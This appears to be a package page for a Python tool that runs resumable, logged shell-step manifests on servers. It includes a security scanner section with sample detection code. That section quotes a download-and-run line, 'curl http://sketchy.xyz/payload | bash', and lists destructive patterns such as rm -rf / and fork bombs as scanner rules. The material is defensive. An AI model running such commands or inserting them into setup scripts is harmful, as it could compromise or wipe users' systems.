
Virtual Package Manager — resumable, trackable script orchestration for VPS and local environments


VPM — Virtual Package Manager

Resumable, trackable script orchestration for VPS and local environments.
Define steps. Run them. Resume if interrupted. Rollback if needed.



Why VPM?

You SSH into a server. You need to run 30+ commands to set up Docker, Nginx, firewall, SSL, your app. Halfway through, your connection drops.

With VPM:

  • Write once — Define steps in a simple manifest file
  • Resume anywhere — Interrupted? Just run vpm install again
  • Track everything — Every step's status, exit code, and full output logged
  • Stay safe — Built-in security scanner catches risky commands before execution
  • Undo mistakes — Rollback support reverses completed steps
  • Resolve dependencies — App B needs App A? VPM handles the order
  • Zero dependencies — Pure Python 3.10+ stdlib. Nothing to install but VPM itself

Install

pip install vpmx        # or: pipx install vpmx
vpm doctor              # verify everything works

60-Second Demo

# Create a project
mkdir ~/server-setup && cd ~/server-setup
vpm init

# Edit the manifest (or let an AI agent generate one)
nano vpm-manifest.yaml

# Preview what will run
vpm install --dry-run

# Scan for security issues
vpm audit

# Execute
vpm install

# Check status anytime
vpm status

Manifest Format

# vpm-manifest.yaml

[system_base] Core packages
- label: Update system
  run: sudo apt-get update -y && sudo apt-get upgrade -y

- label: Install essentials
  run: sudo apt-get install -y curl wget git htop
  rollback: sudo apt-get remove -y curl wget git htop

[docker] Docker Engine
requires: system_base

- label: Install Docker
  run: |
    curl -fsSL https://get.docker.com | sh
    sudo usermod -aG docker $USER
  rollback: sudo apt-get remove -y docker-ce

- label: Verify
  run: docker --version

That's it. [app_name], requires:, label:, run:, rollback:.


Commands

Command                 What it does
vpm install             Execute manifest (resumes automatically)
vpm install --dry-run   Preview without executing
vpm audit               Security scan a manifest
vpm run <url>           Fetch & execute a remote manifest
vpm rollback <app>      Undo completed steps in reverse
vpm status              Show all tracked apps
vpm logs <app>          Browse execution logs
vpm retry <app>         Resume from failure point
vpm reset <app>         Clear tracking for fresh install
vpm doctor              Diagnose environment



Security Scanner

VPM scans manifests before execution — catching dangerous patterns automatically:

⚠ HIGH: Downloading and piping directly to shell interpreter
  Step 1: Install sketchy tool
    curl http://sketchy.xyz/payload | bash
  → Download first, inspect, then execute.

◐ MEDIUM: URL uses suspicious TLD: .xyz
  → Verify this domain is legitimate.

Severity   Examples
Critical   rm -rf /, fork bombs, disk formatting
High       curl | bash, eval $var, chmod 777
Medium     Unknown URLs, third-party repos, non-HTTPS
Low        sudo usage (expected but noted)

Configurable levels: strict, warn (default), permissive, off.
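
An added example, not VPM's own code: a small pattern scanner in the spirit of the output and severity table above. The regexes, the `Finding` type and the `scan` function are constructed for illustration; only the severity names, the sample commands and the two finding messages for the pipe-to-shell and .xyz cases come from this page.

```python
import re
from typing import NamedTuple

class Finding(NamedTuple):
    severity: str
    step: int      # 1-based step number within the manifest
    label: str
    message: str

ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# Constructed rules, loosely one per example in the severity table above.
# They are illustrative and are not VPM's actual rule set.
RULES = [
    ("critical", r"\brm\s+-\w*r\w*\s+/(?:\s|$)", "Recursive delete of /"),
    ("critical", r"\bmkfs(?:\.\w+)?\b", "Disk formatting"),
    ("high", r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b",
     "Downloading and piping directly to shell interpreter"),
    ("high", r"\beval\s+[\"']?\$", "eval of a variable"),
    ("high", r"\bchmod\s+(?:-\w+\s+)*0?777\b", "World-writable permissions"),
    ("medium", r"\bhttp://", "URL is not HTTPS"),
    ("medium", r"https?://[^/\s]+\.xyz(?:[/:\s]|$)",
     "URL uses suspicious TLD: .xyz"),
    ("low", r"\bsudo\b", "sudo usage"),
]
COMPILED = [(sev, re.compile(rx), msg) for sev, rx, msg in RULES]

def scan(steps):
    """Return findings for (label, run) steps, most severe first."""
    findings = []
    for number, (label, run) in enumerate(steps, start=1):
        for severity, pattern, message in COMPILED:
            if pattern.search(run):
                findings.append(Finding(severity, number, label, message))
    return sorted(findings, key=lambda f: (ORDER[f.severity], f.step))

# Constructed sample: commands quoted from the manifest and scanner output above.
SAMPLE_STEPS = [
    ("Install sketchy tool", "curl http://sketchy.xyz/payload | bash"),
    ("Install Docker",
     "curl -fsSL https://get.docker.com | sh\nsudo usermod -aG docker $USER"),
    ("Verify", "docker --version"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_STEPS):
        print(f"{f.severity.upper():8} step {f.step} ({f.label}): {f.message}")
```

Regex matching over shell text is heuristic: commands assembled from variables or split across steps will not match, so a clean scan does not replace reading a remote manifest before running it.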


Remote Manifests

Run manifests directly from URLs or GitHub repos:

vpm run https://example.com/setup.yaml
vpm run github:user/repo                    # fetches vpm-manifest.yaml
vpm run github:user/repo/path/file.yaml     # specific file

Security scanning is mandatory for remote manifests.


Crash Recovery

You:     vpm install          # starts running
SSH:     *disconnects*        # step 3 of 8 was running
You:     vpm install          # reconnect, run again
VPM:     Steps 1-2 ✔ skip    # already done
         Step 3 → re-run     # was interrupted
         Steps 4-8 → run     # continue normally

The lock file tracks every step atomically. No corruption, no re-running completed work.
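
One way to get the resume behaviour shown above, as an added example that is not VPM's implementation: state is written to a temporary file and renamed into place, and a step is marked running before it executes so that an interrupted step is re-run. The JSON layout, keying state by step label, and the `save_state`, `load_state`, `run_shell` and `install` functions are assumptions of this example.

```python
import json
import os
import subprocess
import tempfile

# Assumed state layout: {label: {"status": ..., "exit_code": ...}}

def save_state(path, state):
    """Write the state file atomically: temp file, fsync, then rename."""
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp = tempfile.mkstemp(dir=directory, prefix=".state-")
    try:
        with os.fdopen(fd, "w") as fh:
            json.dump(state, fh)
            fh.flush()
            os.fsync(fh.fileno())   # data is on disk before the rename
        os.replace(tmp, path)       # readers see the old or new file, never half
    except BaseException:
        if os.path.exists(tmp):
            os.unlink(tmp)
        raise

def load_state(path):
    try:
        with open(path) as fh:
            return json.load(fh)
    except FileNotFoundError:
        return {}

def run_shell(command):
    return subprocess.run(command, shell=True).returncode

def install(steps, path, runner=run_shell):
    """Run (label, command) steps in order; return the labels executed now."""
    state = load_state(path)
    executed = []
    for label, command in steps:
        if state.get(label, {}).get("status") == "done":
            continue                      # finished in an earlier run
        state[label] = {"status": "running"}
        save_state(path, state)           # recorded before the command starts
        code = runner(command)
        executed.append(label)
        state[label] = {"status": "done" if code == 0 else "failed",
                        "exit_code": code}
        save_state(path, state)
        if code != 0:
            break                         # stop at the failure point
    return executed
```

Because an interrupted step is executed again, each step's command needs to be safe to repeat.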


Examples

Real-world manifests in examples/:


For AI Agents

VPM is designed to work with AI assistants. Ask your AI to "create a VPM manifest to set up X" and it works.

  • AGENTS.md — Concise reference for AI context windows
  • llms.txt — Ultra-condensed reference

Documentation

Guide                 What's covered
Manifest Format       Syntax, apps, steps, dependencies, multi-line commands
Commands Reference    All CLI commands with flags and examples
Security & Rollback   Scanner config, rollback system, remote manifests
How It Works          Lock file, step states, crash recovery, change detection
Execution Model       PTY execution, interactive support, file locations
Writing Manifests     Best practices, patterns, anti-patterns, AI agent guidelines
Troubleshooting       Common issues, fixes, architecture overview

Contributing

See CONTRIBUTING.md. No external dependencies — pure Python stdlib.

License

MIT — Mohammed A. Al-Kebsi

Download files

Source Distribution

vpmx-1.2.1.tar.gz (43.5 kB view details)

Uploaded Source

Built Distribution


vpmx-1.2.1-py3-none-any.whl (41.3 kB view details)

Uploaded Python 3

File details

Details for the file vpmx-1.2.1.tar.gz.

File metadata

  • Download URL: vpmx-1.2.1.tar.gz
  • Upload date:
  • Size: 43.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.1.tar.gz
Algorithm Hash digest
SHA256 959d9efdf82352eddc9742ae65ef2951751f985d9b915217bb1658ace802dd61
MD5 e54f71bb5446ae84c6d63307d57afc5c
BLAKE2b-256 a80e6e65613627f5cbdff4e0a45724b425bd7d6fa501a4ba791b55f9e627a00e


Provenance

The following attestation bundles were made for vpmx-1.2.1.tar.gz:

Publisher: publish.yml on Nao-30/vpm

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file vpmx-1.2.1-py3-none-any.whl.

File metadata

  • Download URL: vpmx-1.2.1-py3-none-any.whl
  • Upload date:
  • Size: 41.3 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.1-py3-none-any.whl
Algorithm Hash digest
SHA256 d4e33a0513db6184485506c2283d1cc0530c384cabacd92ce867348310ca6932
MD5 e90592494990573a09e19273642da3cd
BLAKE2b-256 0e606a8af1b69c4febabca8e7011c430d05889ad06530abe87d5f770fa2abe40


Provenance

The following attestation bundles were made for vpmx-1.2.1-py3-none-any.whl:

Publisher: publish.yml on Nao-30/vpm

